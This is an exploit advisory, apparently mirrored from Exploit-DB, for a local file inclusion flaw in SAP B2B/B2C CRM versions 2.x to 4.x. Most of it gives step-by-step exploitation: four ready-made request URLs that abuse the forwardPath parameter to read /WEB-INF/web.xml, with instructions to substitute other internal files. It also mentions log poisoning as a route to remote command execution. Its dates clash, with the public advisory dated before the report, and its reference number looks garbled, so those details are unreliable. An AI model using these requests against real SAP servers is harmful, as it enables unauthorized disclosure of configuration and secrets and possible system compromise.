SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion

  • 作者: Richard Alviarez
    日期: 2018-05-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44655/
  • # Title: SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
    # Application:SAP B2B OR B2C is CRM
    # Versions Affected: SAP B2B OR B2C is CRM 2.x 3.x and 4.x with Bakend R/3 (to icss_b2b)
    # Vendor URL: http://SAP.com
    # Bugs: SAP LFI in B2B OR B2C CRM
    # Sent:2018-05-03
    # Reported:2018-05-03
    # Date of Public Advisory: 2018-02-09
    # Reference: SAP Security Note 1870255656
    # Author: Richard Alviarez
    
    # 1. VULNERABLE PACKAGES
    # SAP LFI in B2B OR B2C CRM v2.x to 4.x
    # Other versions are probably affected too, but they were not checked.
    
    # 2. TECHNICAL DESCRIPTION
    # A possible attacker can take advantage of this vulnerability 
    # to obtain confidential information of the platform, 
    # as well as the possibility of writing in the logs of the
    # registry in order to get remote execution of commands and take control of the system.
    
    
    # 3. Steps to exploit this vulnerability
    
    A. Open
    https://SAP/{name}_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml
    
    Other vulnerable parameters:
    
    https://SAP/{name}_b2b/CatalogClean.do?forwardPath=/WEB-INF/web.xml
    https://SAP/{name}_b2b/IbaseSearchClean.do?forwardPath=/WEB-INF/web.xml
    https://SAP/{name}_b2b/ForwardDynamic.do?forwardPath=/WEB-INF/web.xml
    page on SAP server
    
    B. Change parameter {name} for example icss_b2b or other name....
    
    C. Change "/WEB-INF/web.xml" for other files or archives internal.
    
    
    # 4. Collaborators
    # - CuriositySec
    # - aDoN90
    # - Vis0r